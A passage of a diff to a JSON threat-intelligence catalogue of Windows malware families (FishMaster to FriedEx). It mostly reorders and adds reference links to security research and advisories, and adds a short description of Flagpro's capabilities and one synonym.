"https://thehackernews.com/2022/04/chinese-hackers-target-vmware-horizon.html", - "https://www.fortinet.com/blog/threat-research/deep-panda-log4shell-fire-chili-rootkits" + "https://www.fortinet.com/blog/threat-research/deep-panda-log4shell-fire-chili-rootkits", + "https://thehackernews.com/2022/04/chinese-hackers-target-vmware-horizon.html" ], "synonyms": [], "type": [] @@ -24753,9 +25897,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fishmaster", + "https://decoded.avast.io/luigicamastra/backdoored-client-from-mongolian-ca-monpass/", "https://media-exp1.licdn.com/dms/document/C561FAQHhWFRcWmdCPw/feedshare-document-pdf-analyzed/0/1639591145314?e=1658966400&v=beta&t=_uCcyEVg6b_VDiBTvWQIXtBOdQ1GQAAydqGyq62KA3E", - "https://speakerdeck.com/aragorntseng/winnti-is-coming-evolution-after-prosecution-at-hitcon2021", - "https://decoded.avast.io/luigicamastra/backdoored-client-from-mongolian-ca-monpass/" + "https://speakerdeck.com/aragorntseng/winnti-is-coming-evolution-after-prosecution-at-hitcon2021" ], "synonyms": [ "JollyJellyfish" @@ -24770,18 +25914,18 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fivehands", - "https://research.nccgroup.com/2021/06/15/handy-guide-to-a-new-fivehands-ransomware-variant/", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126b", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/yanluowang-ransomware-attacks-continue", "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/yanluowang-ransomware-attacks-continue", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a", + "https://www.bleepingcomputer.com/news/security/yanluowang-ransomware-operation-matures-with-experienced-affiliates/", "https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html", "https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html", - "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", + "https://research.nccgroup.com/2021/06/15/handy-guide-to-a-new-fivehands-ransomware-variant/", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126b", "https://www.cisa.gov/uscert/ncas/alerts/aa22-249a", + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", "https://www.crowdstrike.com/blog/new-ransomware-variant-uses-golang-packer/", - "https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire", - "https://www.bleepingcomputer.com/news/security/yanluowang-ransomware-operation-matures-with-experienced-affiliates/" + "https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire" ], "synonyms": [ "Thieflock" @@ -24792,16 +25936,16 @@ "value": "FiveHands" }, { - "description": "", + "description": "According to PICUS, Flagpro is malware that collects information from the victim and executes commands in the victim\u2019s environment. It targets Japan, Taiwan, and English-speaking countries. When a victim is infected with Flagpro malware, the malware can do the following:\r\n\r\nDownload and execute a tool\r\nExecute OS commands and send results\r\nCollect and send Windows authentication information", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flagpro", - "https://cyberandramen.net/2021/12/12/more-flagpro-more-problems/", - "https://insight-jp.nttsecurity.com/post/102h7vx/blacktechflagpro", "https://insight-jp.nttsecurity.com/post/102hf3q/flagpro-the-new-malware-used-by-blacktech", + "https://cyberandramen.net/2021/12/12/more-flagpro-more-problems/", + "https://jp.security.ntt/resources/EN-BlackTech_2021.pdf", + "https://insight-jp.nttsecurity.com/post/102h7vx/blacktechflagpro", "https://vblocalhost.com/uploads/VB2021-50.pdf", - "https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_8_hara_en.pdf", - "https://jp.security.ntt/resources/EN-BlackTech_2021.pdf" + "https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_8_hara_en.pdf" ], "synonyms": [ "BUSYICE" @@ -24817,13 +25961,13 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flame", "https://securelist.com/the-flame-questions-and-answers-51/34344/", - "https://storage.googleapis.com/chronicle-research/Flame%202.0%20Risen%20from%20the%20Ashes.pdf", - "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf", "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=ce2df4da-afe9-4a24-b28c-0fb3ba671d95&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments", "https://github.com/juanandresgs/papers/raw/master/Flame%202.0%20Risen%20from%20the%20Ashes.pdf", - "https://www.symantec.com/connect/blogs/flamer-recipe-bluetoothache", "https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf", - "https://www.crysys.hu/publications/files/skywiper.pdf" + "https://www.crysys.hu/publications/files/skywiper.pdf", + "https://storage.googleapis.com/chronicle-research/Flame%202.0%20Risen%20from%20the%20Ashes.pdf", + "https://www.symantec.com/connect/blogs/flamer-recipe-bluetoothache", + "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf" ], "synonyms": [ "sKyWIper" @@ -24838,8 +25982,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flashflood", - "https://www.mandiant.com/sites/default/files/2021-09/rpt-apt30.pdf", - "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" + "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf", + "https://www.mandiant.com/sites/default/files/2021-09/rpt-apt30.pdf" ], "synonyms": [], "type": [] @@ -24852,28 +25996,28 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flawedammyy", - "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf", - "https://threatrecon.nshc.net/2019/08/29/sectorj04-groups-increased-activity-in-2019/", - "https://habr.com/ru/company/pt/blog/475328/", + "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", + "https://intel471.com/blog/a-brief-history-of-ta505", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", - "https://web.archive.org/web/20161223002016/https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", + "https://www.youtube.com/watch?v=N4f2e8Mygag", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://www.proofpoint.com/us/threat-insight/post/ta505-abusing-settingcontent-ms-within-pdf-files-distribute-flawedammyy-rat", "https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505/", - "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do", - "https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-xakerske-ugrupovannya-u-rozpovsyudzhenni-virusu-shifruvalnika-ta-nanesenni-inozemnim-kompaniyam-piv-milyarda-dolariv-zbitkiv/", - "https://www.proofpoint.com/us/threat-insight/post/ta505-begins-summer-campaigns-new-pet-malware-downloader-andromut-uae-south", - "https://blog.trendmicro.com/trendlabs-security-intelligence/ta505-at-it-again-variety-is-the-spice-of-servhelper-and-flawedammyy/", - "https://secrary.com/ReversingMalware/AMMY_RAT_Downloader/", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", - "https://attack.mitre.org/software/S0381/", - "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", "https://www.sans.org/reading-room/whitepapers/reverseengineeringmalware/unpacking-decrypting-flawedammyy-38930", + "https://threatrecon.nshc.net/2019/08/29/sectorj04-groups-increased-activity-in-2019/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/ta505-at-it-again-variety-is-the-spice-of-servhelper-and-flawedammyy/", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", - "https://www.youtube.com/watch?v=N4f2e8Mygag", + "https://www.proofpoint.com/us/threat-insight/post/ta505-begins-summer-campaigns-new-pet-malware-downloader-andromut-uae-south", "https://www.secureworks.com/research/threat-profiles/gold-tahoe", - "https://intel471.com/blog/a-brief-history-of-ta505" + "https://attack.mitre.org/software/S0381/", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505/", + "https://secrary.com/ReversingMalware/AMMY_RAT_Downloader/", + "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf", + "https://habr.com/ru/company/pt/blog/475328/", + "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do", + "https://web.archive.org/web/20161223002016/https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", + "https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-xakerske-ugrupovannya-u-rozpovsyudzhenni-virusu-shifruvalnika-ta-nanesenni-inozemnim-kompaniyam-piv-milyarda-dolariv-zbitkiv/" ], "synonyms": [], "type": [] @@ -24886,22 +26030,25 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flawedgrace", - "https://www.proofpoint.com/us/blog/threat-insight/whatta-ta-ta505-ramps-activity-delivers-new-flawedgrace-variant", - "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", - "https://www.msreverseengineering.com/blog/2021/3/2/an-exhaustively-analyzed-idb-for-flawedgrace", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", - "https://www.secureworks.com/research/threat-profiles/gold-tahoe", - "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/", "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", "https://intel471.com/blog/a-brief-history-of-ta505", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", - "https://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-solarwinds-serv-u-exploit-campaign/", + "https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/", + "https://www.proofpoint.com/us/blog/threat-insight/whatta-ta-ta505-ramps-activity-delivers-new-flawedgrace-variant", + "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/", "https://www.msreverseengineering.com/blog/2019/1/14/a-quick-solution-to-an-ugly-reverse-engineering-problem", + "https://blog.codsec.com/posts/malware/gracewire_adventure/", "https://research.nccgroup.com/2021/12/01/tracking-a-p2p-network-related-with-ta505/", - "https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505", + "https://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-solarwinds-serv-u-exploit-campaign/", + "https://www.msreverseengineering.com/blog/2021/3/2/an-exhaustively-analyzed-idb-for-flawedgrace", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", - "https://twitter.com/MsftSecIntel/status/1273359829390655488" + "https://www.secureworks.com/research/threat-profiles/gold-tahoe", + "https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505", + "https://web.archive.org/web/20221115161556/https://blog.codsec.com/posts/malware/gracewire_adventure/", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://twitter.com/MsftSecIntel/status/1273359829390655488", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf" ], "synonyms": [ "GraceWire" @@ -24929,12 +26076,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.floki_bot", - "https://blog.malwarebytes.com/threat-analysis/2016/11/floki-bot-and-the-stealthy-dropper/", - "https://www.flashpoint-intel.com/flokibot-curious-case-brazilian-connector/", - "https://www.flashpoint-intel.com/blog/cybercrime/floki-bot-emerges-new-malware-kit/", - "https://www.cylance.com/en_us/blog/threat-spotlight-flokibot-pos-malware.html", "http://adelmas.com/blog/flokibot.php", + "https://www.cylance.com/en_us/blog/threat-spotlight-flokibot-pos-malware.html", + "https://www.flashpoint-intel.com/flokibot-curious-case-brazilian-connector/", "https://www.arbornetworks.com/blog/asert/flokibot-flock-bots/", + "https://www.flashpoint-intel.com/blog/cybercrime/floki-bot-emerges-new-malware-kit/", + "https://blog.malwarebytes.com/threat-analysis/2016/11/floki-bot-and-the-stealthy-dropper/", "http://blog.talosintel.com/2016/12/flokibot-collab.html#more" ], "synonyms": [], @@ -24948,11 +26095,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flowcloud", - "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape", - "https://www.dragos.com/blog/industry-news/new-ics-threat-activity-group-talonite/", "https://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/", + "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape", "https://nao-sec.org/2021/01/royal-road-redive.html", "https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new", + "https://www.dragos.com/blog/industry-news/new-ics-threat-activity-group-talonite/", "https://www.proofpoint.com/us/blog/threat-insight/flowcloud-version-413-malware-analysis" ], "synonyms": [], @@ -24966,8 +26113,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flowershop", - "https://storage.googleapis.com/chronicle-research/STUXSHOP%20Stuxnet%20Dials%20In%20.pdf", - "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf" + "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf", + "https://storage.googleapis.com/chronicle-research/STUXSHOP%20Stuxnet%20Dials%20In%20.pdf" ], "synonyms": [], "type": [] @@ -24980,8 +26127,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.floxif", - "https://www.mandiant.com/resources/pe-file-infecting-malware-ot", - "https://www.virusbulletin.com/virusbulletin/2012/12/compromised-library" + "https://www.virusbulletin.com/virusbulletin/2012/12/compromised-library", + "https://www.mandiant.com/resources/pe-file-infecting-malware-ot" ], "synonyms": [], "type": [] @@ -25033,11 +26180,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fobber", - "http://byte-atlas.blogspot.ch/2015/08/knowledge-fragment-unwrapping-fobber.html", - "http://www.govcert.admin.ch/downloads/whitepapers/govcertch_fobber_analysis.pdf", "http://blog.wizche.ch/fobber/malware/analysis/2015/08/10/fobber-encryption.html", "https://www.govcert.admin.ch/blog/12/analysing-a-new-ebanking-trojan-called-fobber", - "https://blog.malwarebytes.com/threat-analysis/2015/06/elusive-hanjuan-ek-caught-in-new-malvertising-campaign/" + "http://byte-atlas.blogspot.ch/2015/08/knowledge-fragment-unwrapping-fobber.html", + "https://blog.malwarebytes.com/threat-analysis/2015/06/elusive-hanjuan-ek-caught-in-new-malvertising-campaign/", + "http://www.govcert.admin.ch/downloads/whitepapers/govcertch_fobber_analysis.pdf" ], "synonyms": [], "type": [] @@ -25050,8 +26197,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fonix", - "https://labs.bitdefender.com/2021/02/fonix-ransomware-decryptor/", - "https://labs.sentinelone.com/the-fonix-raas-new-low-key-threat-with-unnecessary-complexities/" + "https://labs.sentinelone.com/the-fonix-raas-new-low-key-threat-with-unnecessary-complexities/", + "https://labs.bitdefender.com/2021/02/fonix-ransomware-decryptor/" ], "synonyms": [], "type": [] @@ -25064,67 +26211,72 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook", - "https://www.zscaler.com/blogs/security-research/analysis-xloaders-c2-network-encryption", - "https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/", - "https://usualsuspect.re/article/formbook-hiding-in-plain-sight", - "https://securityintelligence.com/posts/roboski-global-recovery-automation/", - "https://www.connectwise.com/resources/formbook-remcos-rat", - "https://www.peerlyst.com/posts/how-to-understand-formbook-a-new-malware-as-a-service-sudhendu?", - "https://www.hornetsecurity.com/en/threat-research/vba-purging-malspam-campaigns/", - "https://www.peerlyst.com/posts/how-to-analyse-formbook-a-new-malware-as-a-service-sudhendu?trk=explore_page_resources_recent", - "https://www.fortinet.com/blog/threat-research/deep-analysis-formbook-new-variant-delivered-phishing-campaign-part-ii", - "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf", - "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ipfs-a-new-data-frontier-or-a-new-cybercriminal-hideout", - "https://www.trendmicro.com/en_us/research/21/i/formbook-adds-latest-office-365-0-day-vulnerability-cve-2021-404.html", - "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", - "https://www.virusbulletin.com/virusbulletin/2019/01/vb2018-paper-inside-formbook-infostealer/", - "https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/trojanized-onenote-document-leads-to-formbook-malware/", - "https://www.arbornetworks.com/blog/asert/formidable-formbook-form-grabber/", - "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/", - "https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/", - "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware", - "https://drive.google.com/file/d/1oxINyIJfMtv_upJqRK9vLSchIBaU8wiU/view", + "https://www.fortinet.com/blog/threat-research/excel-document-delivers-multiple-malware-exploiting-cve-2017-11882-part-two", "https://youtu.be/aQwnHIlGSBM", - "https://link.medium.com/uaBiIXgUU8", - "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/", - "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", - "https://www.fortinet.com/blog/threat-research/deep-analysis-new-formbook-variant-delivered-phishing-campaign-part-I", - "https://www.cyberbit.com/blog/endpoint-security/formbook-research-hints-large-data-theft-attack-brewing/", - "https://www.fortinet.com/blog/threat-research/excel-document-delivers-malware-by-exploiting-cve-2017-11882", - "https://blog.cyble.com/2022/07/01/xloader-returns-with-new-infection-technique/", - "https://blog.talosintelligence.com/2018/06/my-little-formbook.html", - "https://insights.oem.avira.com/a-new-technique-to-analyze-formbook-malware-infections/", - "https://thisissecurity.stormshield.com/2018/03/29/in-depth-formbook-malware-analysis-obfuscation-and-process-injection/", - "https://www.botconf.eu/wp-content/uploads/2018/12/2018-R-Jullian-In-depth-Formbook-Malware-Analysis.pdf", - "https://www.lac.co.jp/lacwatch/report/20220307_002893.html", - "https://www.fireeye.com/blog/threat-research/2017/10/formbook-malware-distribution-campaigns.html", - "https://www.malwarebytes.com/blog/threat-intelligence/2022/20221121-threat-intel-report-final.pdf", - "https://www.trellix.com/en-us/about/newsroom/stories/research/cyberattacks-targeting-ukraine-increase.html", "https://blog.malwarebytes.com/threat-analysis/2021/05/revisiting-the-nsis-based-crypter/", - "https://blogs.blackberry.com/en/2021/09/threat-thursday-xloader-infostealer", - "https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/", - "https://tccontre.blogspot.com/2020/11/interesting-formbook-crypter.html", - "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord", - "https://forensicitguy.github.io/xloader-formbook-velvetsweatshop-spreadsheet/", + "https://www.arbornetworks.com/blog/asert/formidable-formbook-form-grabber/", + "https://www.netskope.com/blog/new-formbook-campaign-delivered-through-phishing-emails", + "https://www.fortinet.com/blog/threat-research/excel-document-delivers-malware-by-exploiting-cve-2017-11882", "https://blog.talosintelligence.com/2019/07/sweed-agent-tesla.html", + "https://blogs.quickheal.com/formbook-malware-returns-new-variant-uses-steganography-and-in-memory-loading-of-multiple-stages-to-steal-data/", + "https://blog.talosintelligence.com/2018/06/my-little-formbook.html", + "https://www.fortinet.com/blog/threat-research/deep-analysis-new-formbook-variant-delivered-phishing-campaign-part-I", + "https://www.malware-traffic-analysis.net/2023/06/05/index.html", + "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", + "https://www.fireeye.com/blog/threat-research/2017/10/formbook-malware-distribution-campaigns.html", + "https://elastic.github.io/security-research/intelligence/2022/01/01.formbook-adopts-cabless-approach/article/", + "https://blog.cyble.com/2022/07/01/xloader-returns-with-new-infection-technique/", + "https://insights.oem.avira.com/a-new-technique-to-analyze-formbook-malware-infections/", + "https://www.peerlyst.com/posts/how-to-understand-formbook-a-new-malware-as-a-service-sudhendu?", + "https://link.medium.com/uaBiIXgUU8", + "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord", + "https://www.botconf.eu/wp-content/uploads/2018/12/2018-R-Jullian-In-depth-Formbook-Malware-Analysis.pdf", + "https://www.fortinet.com/blog/threat-research/deep-analysis-formbook-new-variant-delivered-phishing-campaign-part-ii", + "http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html", + "https://www.zscaler.com/blogs/security-research/technical-analysis-xloaders-code-obfuscation-version-43", + "https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/", + "https://usualsuspect.re/article/formbook-hiding-in-plain-sight", + "https://cert.gov.ua/article/955924", + "https://www.cyren.com/blog/articles/example-analysis-of-multi-component-malware", + "https://tccontre.blogspot.com/2020/11/interesting-formbook-crypter.html", + "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf", + "https://www.zscaler.com/blogs/security-research/analysis-xloaders-c2-network-encryption", + "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors", + "https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/", + "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/", + "https://thisissecurity.stormshield.com/2018/03/29/in-depth-formbook-malware-analysis-obfuscation-and-process-injection/", + "https://www.peerlyst.com/posts/how-to-analyse-formbook-a-new-malware-as-a-service-sudhendu?trk=explore_page_resources_recent", + "https://securityintelligence.com/posts/roboski-global-recovery-automation/", + "https://www.trellix.com/en-us/about/newsroom/stories/research/cyberattacks-targeting-ukraine-increase.html", + "https://blog.netlab.360.com/purecrypter", + "https://forensicitguy.github.io/xloader-formbook-velvetsweatshop-spreadsheet/", + "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware", + "http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/", "https://isc.sans.edu/diary/26806", "https://www.cyberbit.com/formbook-research-hints-large-data-theft-attack-brewing/", - "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors", - "https://asec.ahnlab.com/en/32149/", - "https://www.fortinet.com/blog/threat-research/excel-document-delivers-multiple-malware-exploiting-cve-2017-11882-part-two", - "https://news.sophos.com/en-us/2020/05/14/raticate/", - "http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html", - "https://www.cyren.com/blog/articles/example-analysis-of-multi-component-malware", - "https://yoroi.company/research/office-documents-may-the-xll-technique-change-the-threat-landscape-in-2022/", - "http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/", - "https://cert.gov.ua/article/955924", - "https://www.netskope.com/blog/new-formbook-campaign-delivered-through-phishing-emails", - "https://blog.netlab.360.com/purecrypter", - "https://blogs.quickheal.com/formbook-malware-returns-new-variant-uses-steganography-and-in-memory-loading-of-multiple-stages-to-steal-data/", - "http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html", + "https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/", + "https://drive.google.com/file/d/1oxINyIJfMtv_upJqRK9vLSchIBaU8wiU/view", + "https://kienmanowar.wordpress.com/2023/07/06/quicknote-examining-formbook-campaign-via-phishing-emails/", + "https://www.virusbulletin.com/virusbulletin/2019/01/vb2018-paper-inside-formbook-infostealer/", + "https://www.trendmicro.com/en_us/research/21/i/formbook-adds-latest-office-365-0-day-vulnerability-cve-2021-404.html", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ipfs-a-new-data-frontier-or-a-new-cybercriminal-hideout", + "https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/", - "https://elastic.github.io/security-research/intelligence/2022/01/01.formbook-adopts-cabless-approach/article/" + "https://www.connectwise.com/resources/formbook-remcos-rat", + "https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/", + "https://www.hornetsecurity.com/en/threat-research/vba-purging-malspam-campaigns/", + "https://github.com/itaymigdal/malware-analysis-writeups/blob/main/FormBook/FormBook.md", + "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/", + "https://blogs.blackberry.com/en/2021/09/threat-thursday-xloader-infostealer", + "https://www.malwarebytes.com/blog/threat-intelligence/2022/20221121-threat-intel-report-final.pdf", + "https://www.lac.co.jp/lacwatch/report/20220307_002893.html", + "http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html", + "https://www.cyberbit.com/blog/endpoint-security/formbook-research-hints-large-data-theft-attack-brewing/", + "https://news.sophos.com/en-us/2020/05/14/raticate/", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/trojanized-onenote-document-leads-to-formbook-malware/", + "https://asec.ahnlab.com/en/32149/", + "https://yoroi.company/research/office-documents-may-the-xll-technique-change-the-threat-landscape-in-2022/" ], "synonyms": [ "win.xloader" @@ -25139,11 +26291,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.former_first_rat", - "https://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/", - "https://decoded.avast.io/luigicamastra/operation-dragon-castling-apt-group-targeting-betting-companies", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-tools-and-connections/", "https://threatvector.cylance.com/en_us/home/breaking-down-ff-rat-malware.html", "https://unit42.paloaltonetworks.com/atoms/shallowtaurus/", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-tools-and-connections/" + "https://decoded.avast.io/luigicamastra/operation-dragon-castling-apt-group-targeting-betting-companies", + "https://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/" ], "synonyms": [ "ffrat" @@ -25198,11 +26350,13 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.freenki", "https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/", - "https://www.trendmicro.com/en_us/research/20/l/who-is-the-threat-actor-behind-operation-earth-kitsune-.html", "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", + "https://www.trendmicro.com/en_us/research/20/l/who-is-the-threat-actor-behind-operation-earth-kitsune-.html", "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html" ], - "synonyms": [], + "synonyms": [ + "SHUTTERSPEED" + ], "type": [] }, "uuid": "f86b675a-b7b2-4a40-b4fd-f62fd96440f1", @@ -25213,39 +26367,39 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.friedex", - "https://www.youtube.com/watch?v=LUxOcpIRxmg", + "https://lka.polizei.nrw/presse/schlag-gegen-international-agierendes-netzwerk-von-cyber-kriminellen", "https://www.bleepingcomputer.com/news/security/doppelpaymer-ransomware-launches-site-to-post-victims-data/", "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", - "https://www.armor.com/resources/threat-intelligence/the-evolution-of-doppel-spider-from-bitpaymer-to-grief-ransomware/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/account-with-admin-privileges-abused-to-install-bitpaymer-ransomware-via-psexec", - "https://www.crowdstrike.com/blog/hades-ransomware-successor-to-indrik-spiders-wastedlocker/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/", - "https://www.crowdstrike.com/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/", - 